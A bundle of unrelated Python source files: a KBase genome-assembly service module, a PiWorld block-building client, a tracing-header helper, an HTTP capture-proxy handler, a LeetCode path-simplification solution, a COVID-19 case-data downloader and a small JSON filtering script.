logger.debug('CMD: {}'.format(cmdstr))
subprocess.check_call(cmdstr, shell=True)
cmd = ['ar-get', '-j', job_id, '-w', '-r']
logger.debug('CMD: {}'.format(' '.join(cmd)))
ar_report = subprocess.check_output(cmd)
self.log(console, "\nDONE\n")
client = AssemblyUtil(self.callback_url)
assembly_ref = client.save_assembly_from_fasta({
'file':{'path':output_contigs},
'workspace_name':params['workspace_name'],
'assembly_name':params['output_contigset_name']
})
lengths = []
for seq_record in SeqIO.parse(output_contigs, 'fasta'):
lengths.append(len(seq_record.seq))
provenance = [{}]
if 'provenance' in ctx:
provenance = ctx['provenance']
# add additional info to provenance here, in this case the input data object reference
if 'read_library_names' in params:
provenance[0]['input_ws_objects']=[params['workspace_name']+'/'+x for x in params['read_library_names']]
elif 'read_library_refs' in params:
provenance[0]['input_ws_objects']=[x for x in params['read_library_refs']]
os.remove(tmp_data)
#shutil.rmtree(output_dir)
# create a Report
report = ''
report += '============= Raw Contigs ============\n' + ar_report + '\n'
report += '========== Filtered Contigs ==========\n'
report += 'ContigSet saved to: '+params['workspace_name']+'/'+params['output_contigset_name']+'\n'
report += 'Assembled into '+str(len(lengths)) + ' contigs.\n'
report += 'Average Length: '+str(sum(lengths)/float(len(lengths))) + ' bp.\n'
# compute a simple contig length distribution
bins = 10
counts, edges = np.histogram(lengths, bins)
report += 'Contig Length Distribution (# of contigs -- min to max basepairs):\n'
for c in range(bins):
report += ' '+str(counts[c]) + '\t--\t' + str(edges[c]) + ' to ' + str(edges[c+1]) + ' bp\n'
print report
reportObj = {
'objects_created':[{'ref':params['workspace_name']+'/'+params['output_contigset_name'], 'description':'Assembled contigs'}],
'text_message': report
}
reportName = '{}.report.{}'.format(assembler, job_id)
report_obj_info = ws.save_objects({
'id': wsid,
'objects': [
{
'type': 'KBaseReport.Report',
'data': reportObj,
'name': reportName,
'meta': {},
'hidden': 1,
'provenance': provenance
}
]
})[0]
output = { 'report_name': reportName, 'report_ref': str(report_obj_info[6]) + '/' + str(report_obj_info[0]) + '/' + str(report_obj_info[4]) }
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method filter_contigs return value ' +
'returnVal is not type dict as required.')
# return the results
return output
#END_CLASS_HEADER
# config contains contents of config file in a hash or None if it couldn't
# be found
def __init__(self, config):
#BEGIN_CONSTRUCTOR
self.workspaceURL = config['workspace-url']
self.scratch = os.path.abspath(config['scratch'])
self.callback_url = os.environ['SDK_CALLBACK_URL']
if not os.path.exists(self.scratch):
os.makedirs(self.scratch)
#END_CONSTRUCTOR
pass
def run_kiki(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_kiki
output = self.arast_run(ctx, params, "kiki")
#END run_kiki
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_kiki return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_velvet(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_velvet
output = self.arast_run(ctx, params, "velvet")
#END run_velvet
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_velvet return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_miniasm(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_miniasm
output = self.arast_run(ctx, params, "miniasm")
#END run_miniasm
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_miniasm return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_spades(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_spades
output = self.arast_run(ctx, params, "spades")
#END run_spades
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_spades return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_idba(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_idba
output = self.arast_run(ctx, params, "idba")
#END run_idba
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_idba return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_megahit(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_megahit
output = self.arast_run(ctx, params, "megahit")
#END run_megahit
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_megahit return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_ray(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_ray
output = self.arast_run(ctx, params, "ray")
#END run_ray
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_ray return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_masurca(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_masurca
output = self.arast_run(ctx, params, "masurca")
#END run_masurca
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_masurca return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_a5(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_a5
output = self.arast_run(ctx, params, "a5")
#END run_a5
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_a5 return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_a6(self, ctx, params):
"""
:param params: instance of type "AssemblyParams" (Run individual
assemblers supported by AssemblyRAST. workspace_name - the name of
the workspace for input/output read_library_name - the name of the
PE read library (SE library support in the future)
output_contig_set_name - the name of the output contigset
extra_params - assembler specific parameters min_contig_length -
minimum length of contigs to output, default 200 @optional
min_contig_len @optional extra_params) -> structure: parameter
"workspace_name" of String, parameter "read_library_names" of list
of String, parameter "read_library_refs" of list of String,
parameter "output_contigset_name" of String, parameter
"min_contig_len" of Long, parameter "extra_params" of list of
String
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_a6
output = self.arast_run(ctx, params, "a6")
#END run_a6
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_a6 return value ' +
'output is not type dict as required.')
# return the results
return [output]
def run_arast(self, ctx, params):
"""
:param params: instance of type "ArastParams" (Call AssemblyRAST.
workspace_name - the name of the workspace for input/output
read_library_name - the name of the PE read library (SE library
support in the future) output_contig_set_name - the name of the
output contigset extra_params - assembler specific parameters
min_contig_length - minimum length of contigs to output, default
200 @optional recipe @optional assembler @optional pipeline
@optional min_contig_len) -> structure: parameter "workspace_name"
of String, parameter "read_library_names" of list of String,
parameter "read_library_refs" of list of String, parameter
"output_contigset_name" of String, parameter "recipe" of String,
parameter "assembler" of String, parameter "pipeline" of String,
parameter "min_contig_len" of Long
:returns: instance of type "AssemblyOutput" -> structure: parameter
"report_name" of String, parameter "report_ref" of String
"""
# ctx is the context object
# return variables are: output
#BEGIN run_arast
output = self.arast_run(ctx, params, params.get('assembler', ""))
#END run_arast
# At some point might do deeper type checking...
if not isinstance(output, dict):
raise ValueError('Method run_arast return value ' +
'output is not type dict as required.')
# return the results
return [output]
def status(self, ctx):
#BEGIN_STATUS
returnVal = {'state': "OK",
'message': "",
'version': self.VERSION,
'git_url': self.GIT_URL,
'git_commit_hash': self.GIT_COMMIT_HASH}
#END_STATUS
return [returnVal]
|
# This file allows you to programmatically create blocks in PiWorld.
# Please use this wisely. Test on your own server first. Do not abuse it.
import socket
import sys
import time
DEFAULT_HOST = '127.0.0.1'
DEFAULT_PORT = 4080
EMPTY = 0
GRASS = 1
SAND = 2
STONE = 3
BRICK = 4
WOOD = 5
CEMENT = 6
DIRT = 7
PLANK = 8
SNOW = 9
GLASS = 10
COBBLE = 11
LIGHT_STONE = 12
DARK_STONE = 13
CHEST = 14
LEAVES = 15
CLOUD = 16
TALL_GRASS = 17
YELLOW_FLOWER = 18
RED_FLOWER = 19
PURPLE_FLOWER = 20
SUN_FLOWER = 21
WHITE_FLOWER = 22
BLUE_FLOWER = 23
COLOR_11 = 43
OFFSETS = [
(-0.5, -0.5, -0.5),
(-0.5, -0.5, 0.5),
(-0.5, 0.5, -0.5),
(-0.5, 0.5, 0.5),
(0.5, -0.5, -0.5),
(0.5, -0.5, 0.5),
(0.5, 0.5, -0.5),
(0.5, 0.5, 0.5),
]
def sphere(cx, cy, cz, r, fill=False, fx=False, fy=False, fz=False):
result = set()
for x in range(cx - r, cx + r + 1):
if fx and x != cx:
continue
for y in range(cy - r, cy + r + 1):
# if y < cy:
# continue # top hemisphere only
if fy and y != cy:
continue
for z in range(cz - r, cz + r + 1):
if fz and z != cz:
continue
inside = False
outside = fill
for dx, dy, dz in OFFSETS:
ox, oy, oz = x + dx, y + dy, z + dz
d2 = (ox - cx) ** 2 + (oy - cy) ** 2 + (oz - cz) ** 2
d = d2 ** 0.5
if d < r:
inside = True
else:
outside = True
if inside and outside:
result.add((x, y, z))
return result
def circle_x(x, y, z, r, fill=False):
return sphere(x, y, z, r, fill, fx=True)
def circle_y(x, y, z, r, fill=False):
return sphere(x, y, z, r, fill, fy=True)
def circle_z(x, y, z, r, fill=False):
return sphere(x, y, z, r, fill, fz=True)
def cylinder_x(x1, x2, y, z, r, fill=False):
x1, x2 = sorted((x1, x2))
result = set()
for x in range(x1, x2 + 1):
result |= circle_x(x, y, z, r, fill)
return result
def cylinder_y(x, y1, y2, z, r, fill=False):
y1, y2 = sorted((y1, y2))
result = set()
for y in range(y1, y2 + 1):
result |= circle_y(x, y, z, r, fill)
return result
def cylinder_z(x, y, z1, z2, r, fill=False):
z1, z2 = sorted((z1, z2))
result = set()
for z in range(z1, z2 + 1):
result |= circle_z(x, y, z, r, fill)
return result
def cuboid(x1, x2, y1, y2, z1, z2, fill=True):
x1, x2 = sorted((x1, x2))
y1, y2 = sorted((y1, y2))
z1, z2 = sorted((z1, z2))
result = set()
a = (x1 == x2) + (y1 == y2) + (z1 == z2)
for x in range(x1, x2 + 1):
for y in range(y1, y2 + 1):
for z in range(z1, z2 + 1):
n = 0
n += x in (x1, x2)
n += y in (y1, y2)
n += z in (z1, z2)
if not fill and n <= a:
continue
result.add((x, y, z))
return result
def pyramid(x1, x2, y, z1, z2, fill=False):
x1, x2 = sorted((x1, x2))
z1, z2 = sorted((z1, z2))
result = set()
while x2 >= x1 and z2 >= z2:
result |= cuboid(x1, x2, y, y, z1, z2, fill)
y, x1, x2, z1, z2 = y + 1, x1 + 1, x2 - 1, z1 + 1, z2 - 1
return result
class Client(object):
def __init__(self, host, port):
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((host, port))
def set_block(self, x, y, z, w):
self.conn.sendall('B,%d,%d,%d,%d\n' % (x, y, z, w))
time.sleep(0.004) # pause long enough for a pi0 server to update
def set_blocks(self, blocks, w):
key = lambda block: (block[1], block[0], block[2])
for x, y, z in sorted(blocks, key=key):
self.set_block(x, y, z, w)
def bitmap(self, sx, sy, sz, d1, d2, data, lookup):
x, y, z = sx, sy, sz
dx1, dy1, dz1 = d1
dx2, dy2, dz2 = d2
for row in data:
x = sx if dx1 else x
y = sy if dy1 else y
z = sz if dz1 else z
for c in row:
w = lookup.get(c)
if w is not None:
self.set_block(x, y, z, w)
x, y, z = x + dx1, y + dy1, z + dz1
x, y, z = x + dx2, y + dy2, z + dz2
def get_client():
default_args = [DEFAULT_HOST, DEFAULT_PORT]
args = sys.argv[1:] + [None] * len(default_args)
host, port = [a or b for a, b in zip(args, default_args)]
client = Client(host, int(port))
return client
def main():
client = get_client()
set_block = client.set_block
set_blocks = client.set_blocks
# set_blocks(circle_y(0, 32, 0, 16, True), STONE)
# set_blocks(circle_y(0, 33, 0, 16), BRICK)
# set_blocks(cuboid(-1, 1, 1, 31, -1, 1), CEMENT)
# set_blocks(cuboid(-1024, 1024, 32, 32, -3, 3), STONE)
# set_blocks(cuboid(-3, 3, 32, 32, -1024, 1024), STONE)
# set_blocks(cuboid(-1024, 1024, 33, 33, -3, -3), BRICK)
# set_blocks(cuboid(-1024, 1024, 33, 33, 3, 3), BRICK)
# set_blocks(cuboid(-3, -3, 33, 33, -1024, 1024), BRICK)
# set_blocks(cuboid(3, 3, 33, 33, -1024, 1024), BRICK)
# set_blocks(sphere(0, 32, 0, 16), GLASS)
# for y in range(1, 32):
# set_blocks(circle_y(0, y, 0, 4, True), CEMENT)
# set_blocks(circle_x(16, 33, 0, 3), BRICK)
# set_blocks(circle_x(-16, 33, 0, 3), BRICK)
# set_blocks(circle_z(0, 33, 16, 3), BRICK)
# set_blocks(circle_z(0, 33, -16, 3), BRICK)
# for x in range(0, 1024, 32):
# set_blocks(cuboid(x - 1, x + 1, 31, 32, -1, 1), CEMENT)
# set_blocks(cuboid(-x - 1, -x + 1, 31, 32, -1, 1), CEMENT)
# set_blocks(cuboid(x, x, 1, 32, -1, 1), CEMENT)
# set_blocks(cuboid(-x, -x, 1, 32, -1, 1), CEMENT)
# for z in range(0, 1024, 32):
# set_blocks(cuboid(-1, 1, 31, 32, z - 1, z + 1), CEMENT)
# set_blocks(cuboid(-1, 1, 31, 32, -z - 1, -z + 1), CEMENT)
# set_blocks(cuboid(-1, 1, 1, 32, z, z), CEMENT)
# set_blocks(cuboid(-1, 1, 1, 32, -z, -z), CEMENT)
# for x in range(0, 1024, 8):
# set_block(x, 32, 0, CEMENT)
# set_block(-x, 32, 0, CEMENT)
# for z in range(0, 1024, 8):
# set_block(0, 32, z, CEMENT)
# set_block(0, 32, -z, CEMENT)
# set_blocks(pyramid(32, 32+64-1, 12, 32, 32+64-1), COBBLE)
# outer = circle_y(0, 32, 0, 176 + 3, True)
# inner = circle_y(0, 32, 0, 176 - 3, True)
# set_blocks(outer - inner, STONE)
# a = sphere(-32, 48, -32, 24, True)
# b = sphere(-24, 40, -24, 24, True)
# set_blocks(a - b, PLANK)
# set_blocks(cylinder_x(-64, 64, 32, 0, 8), STONE)
# data = [
# '.......................................',
# '..rrr..r..x...x..xxx..xxxx..x....xxxx..',
# '.r...r.r..x...x.x...x.x...x.x....x...x.',
# '.rrrr..r..x.x.x.x...x.xxxx..x....x...x.',
# '.r.....r..x.x.x.x...x.x..x..x....x...x.',
# '.r.....r...xxx...xxx..x...x.xxxx.xxxx..',
# '.......................................',
# ]
# lookup = {
# 'r': COLOR_11,
# 'x': STONE,
# '.': PLANK,
# }
# client.bitmap(2, 32, 32, (1, 0, 0), (0, -1, 0), data, lookup)
if __name__ == '__main__':
main()
|
"""
Tracing Context Injection.
@author: Hao Song (songhao@vmware.com)
"""
import opentracing
# pylint: disable=protected-access
def inject_as_headers(tracer, span, request):
"""Inject tracing context into header."""
text_carrier = {}
tracer._tracer.inject(span.context, opentracing.Format.TEXT_MAP,
text_carrier)
for (key, val) in text_carrier.items():
request.add_header(key, val)
|
import logging
import re
import socket
from http.client import HTTPMessage
from .proxy2 import ProxyRequestHandler
from .request import Request, Response
from .utils import is_list_alike
log = logging.getLogger(__name__)
class CaptureMixin:
"""Mixin that handles the capturing of requests and responses."""
def capture_request(self, request):
"""Capture a request and save the unique id associated with the
captured request in the id field.
If any modification rules are set, the request will be modified
before capture.
Args:
request: The request to capture.
Returns: The captured request id.
"""
ignore_method = request.method in self.server.options.get(
'ignore_http_methods', ['OPTIONS'])
not_in_scope = not self.in_scope(self.server.scopes, request.url)
if ignore_method or not_in_scope:
log.debug('Not capturing %s request: %s', request.method, request.url)
return
log.info('Capturing request: %s', request.url)
# Save the request to our storage
self.server.storage.save_request(request)
def capture_response(self, request_id, url, response):
"""Capture a response and its body that relate to a previous request.
Args:
request_id: The id of the original request.
url: The request url.
response: The response to capture.
"""
log.info('Capturing response: %s %s %s', url, response.status_code, response.reason)
self.server.storage.save_response(request_id, response)
def in_scope(self, scopes, url):
if not scopes:
return True
elif not is_list_alike(scopes):
scopes = [scopes]
for scope in scopes:
match = re.search(scope, url)
if match:
return True
return False
class CaptureRequestHandler(CaptureMixin, ProxyRequestHandler):
"""Specialisation of ProxyRequestHandler that captures requests and responses
that pass through the proxy server.
"""
def __init__(self, *args, **kwargs):
try:
super().__init__(*args, **kwargs)
except (ConnectionError, socket.timeout, FileNotFoundError) as e:
# Suppress connectivity related tracebacks to prevent these normally
# harmless exceptions from alarming users. These exceptions can often
# occur during server shutdown.
if self.server.options.get('suppress_connection_errors', True):
log.debug(str(e))
else:
raise e
def handle_request(self, req, req_body):
"""Captures a request and its body.
Args:
req: The request (an instance of CaptureRequestHandler).
req_body: The binary request body.
"""
# First make any modifications to the request
# DEPRECATED. This will be replaced by request_interceptor
req.body = req_body # Temporarily attach the body to the request for modification
self.server.modifier.modify_request(req, urlattr='path', methodattr='command')
req_body = req.body
# Convert the implementation specific request to one of our requests
# for handling.
request = self._create_request(req, req_body)
# Call the request interceptor if set
if self.server.request_interceptor is not None:
self.server.request_interceptor(request)
if request.response:
# The interceptor has created a response for us to send back immediately
self.commit_response(
request.response.status_code,
request.response.reason,
request.response.headers,
request.response.body
)
return False # Signals that we've committed the response ourselves
# Transfer any modifications to the original request
req.command = request.method
req.path = request.url
req.headers = HTTPMessage()
for name, val in request.headers.items():
req.headers.add_header(name, val)
if request.body:
req_body = request.body
self.capture_request(request)
if request.id is not None: # Will not be None when captured
req.id = request.id
return req_body
def handle_response(self, req, req_body, res, res_body):
"""Captures a response and its body that relate to a previous request.
Args:
req: The original request (an instance of CaptureRequestHandler).
req_body: The body of the original request.
res: The response (a http.client.HTTPResponse instance) that corresponds to the request.
res_body: The binary response body.
"""
# Make any modifications to the response
# DEPRECATED. This will be replaced by response_interceptor.
self.server.modifier.modify_response(res, req, urlattr='path')
if not hasattr(req, 'id'):
# Request was not captured
return
# Convert the implementation specific response to one of our responses
# for handling.
response = Response(
status_code=res.status,
reason=res.reason,
headers=res.headers.items(),
body=res_body
)
# Call the response interceptor if set
if self.server.response_interceptor is not None:
self.server.response_interceptor(self._create_request(req, req_body, response), response)
# Transfer any modifications to the original response
res.status = response.status_code
res.reason = response.reason
res.headers = HTTPMessage()
for name, val in response.headers.items():
res.headers.add_header(name, val)
if response.body:
res_body = response.body
self.capture_response(req.id, req.path, response)
return res_body
def _create_request(self, req, req_body, response=None):
request = Request(
method=req.command,
url=req.path,
headers=req.headers.items(),
body=req_body
)
request.response = response
return request
@property
def certdir(self):
"""Overrides the certdir attribute to retrieve the storage-specific certificate directory."""
return self.server.storage.get_cert_dir()
def log_request(self, code='-', size='-'):
# Send server log messages through our own logging config.
try:
log.debug('%s %s', self.path, code)
except AttributeError:
pass
def log_message(self, format_, *args):
# Send messages through our own logging config.
log.debug(format_, *args)
def log_error(self, format_, *args):
# Suppress "Request timed out: timeout('timed out',)"
if args and isinstance(args[0], socket.timeout):
return
# Send server error messages through our own logging config.
log.error(format_, *args, exc_info=True)
def create_custom_capture_request_handler(custom_response_handler):
"""Creates a custom class derived from CaptureRequestHandler with the
handle_response method overwritten to return
custom_response_handler after running super().handle_response
DEPRECATED. Use response_interceptor.
"""
class CustomCaptureRequestHandler(CaptureRequestHandler):
def handle_response(self, *args, **kwargs):
super().handle_response(*args, **kwargs)
return custom_response_handler(*args, **kwargs)
return CustomCaptureRequestHandler
|
'''
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
'''
class Solution:
def simplifyPath(self, path: str) -> str:
path = path.split('/')
output = []
for idx, x in enumerate(path):
if x == '..':
output = output[:-1]
elif x == '.' or x == '':
continue
else:
output.append(x)
return '/' + '/'.join(output)
|
import datetime
from io import StringIO
import concurrent.futures
import os
import sys
import pandas as pd
import requests
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from top_counties import most_infected
def days_between(start_date: datetime.date, end_date: datetime.date) -> list:
"""returns a list of datetime date objects for each day between the start and end dates
Args:
start_date (datetime.date): start date
end_date (datetime.date): end date
Returns:
list: list of date objects
"""
return [start_date + datetime.timedelta(days=i) for i in range((end_date - start_date).days + 1)]
def us_data(start_date: datetime.date, end_date: datetime.date) -> list:
"""returns United States COVID-19 data
Args:
start_date (datetime.date): start date
end_date (datetime.date): end date
Returns:
list: list of pandas DataFrames; one DataFrame for each day
"""
base_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/'
days = days_between(start_date, end_date)
data = []
for day in days:
date = day.strftime('%m-%d-%Y') # string representation of date
url = base_url + date + '.csv' # url to get
raw = StringIO(requests.get(url).text) # content of file
df = pd.read_csv(raw) # pandas DataFrame
try:
df = df[df['Country_Region'] == 'US'] # filtered to only US
except KeyError:
df = df[df['Country/Region'] == 'US'] # filtered to only US
data.append(df)
return data
# def new_cases(day: datetime.date, location: str) -> int:
# """returns the number of new cases on any day and in any city in the United States
# Args:
# day (datetime.date): day to get new cases
# location (str): county to get new cases
# Returns:
# int: new cases
# """
# yesterday = day - datetime.timedelta(days=1)
# old, new = us_data(yesterday, day)
# try:
# old = old.loc[old['Admin2'] == location, 'Confirmed'].iloc[0]
# except KeyError:
# old = 0
# try:
# new = new.loc[new['Admin2'] == location, 'Confirmed'].iloc[0]
# except KeyError:
# return 0
# return new - old
# def daily_new_cases(start_date: datetime.date, end_date: datetime.date, location: str) -> list:
# """returns the daily new cases data for a specific county
# Args:
# start_date (datetime.date): start date
# end_date (datetime.date): end date
# location (str): county
# Returns:
# list: list of integers containing daily new cases data
# """
# cases = [new_cases(day, location)
# for day in days_between(start_date, end_date)]
# return cases
def confirmed_cases(day: datetime.date, county: str, state: str) -> int:
day = day.strftime('%m-%d-%Y')
url = f'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_daily_reports/{day}.csv'
df = pd.read_csv(StringIO(requests.get(url).text))
df = df.loc[df['Country_Region'] == 'US']
df = df.loc[df['Province_State'] == state]
df = df[['Admin2', 'Confirmed']]
return int(df.loc[df['Admin2'] == county]['Confirmed'].iloc[0])
def daily_confirmed_cases_complete(start_date, end_date, county, state):
cases = {}
for day in days_between(start_date, end_date):
cases[day] = confirmed_cases(day, county, state)
cases = pd.DataFrame([[key, value] for key, value in cases.items()])
cases.columns = ['Date', 'Confirmed']
cases.set_index('Date', inplace=True)
with open(r'Data Collection\Data\COVID-19\\' + state.replace(' ', '-') + '_' + county.replace(' ', '-') + '.csv', 'w', newline='') as f:
print(county + ', ' + state + ' export complete')
f.write(cases.to_csv())
if __name__ == "__main__":
start_date = datetime.date(2020, 3, 31)
end_date = datetime.date(2020, 5, 31)
with open(r'Data Collection\Apparatus\Docs\counties.csv') as f:
locations = list(map(tuple, [(''.join([i for i in j if i.isalpha() or i == ',' or i == ' ']).split(', ')) for j in f.readlines()]))
with concurrent.futures.ThreadPoolExecutor() as executor:
_ = [executor.submit(daily_confirmed_cases_complete, start_date, end_date, county, state) for county, state in locations[::-1]]
exit(0)
daily_confirmed_cases_complete(start_date, end_date, 'New York City', 'New York')
for county, state in most_infected(5, start_date, False):
cases = {}
for day in days_between(start_date, end_date):
cases[day] = confirmed_cases(day, county, state)
cases = pd.DataFrame([[key, value] for key, value in cases.items()])
cases.columns = ['Date', 'Confirmed']
cases.set_index('Date', inplace=True)
with open(r'Data Collection\Data\COVID-19\\' + county + '.csv', 'w', newline='') as f:
f.write(cases.to_csv())
|
import json
import operator
def filter_dict(input_dict):
output_dict = dict()
for tmp_verb in input_dict:
sorted_x = sorted(input_dict[tmp_verb].items(), key=operator.itemgetter(1))
output_dict[tmp_verb] = sorted_x[:5]
return output_dict
with open('verb_nsubj_amod_dict.json', 'r') as nsubj_f:
verb_nsubj_amod_dict = json.load(nsubj_f)
with open('verb_dobj_amod_dict.json', 'r') as dobj_f:
verb_dobj_amod_dict = json.load(dobj_f)
# filtered_nsubj_dict = filter_dict(verb_nsubj_amod_dict)
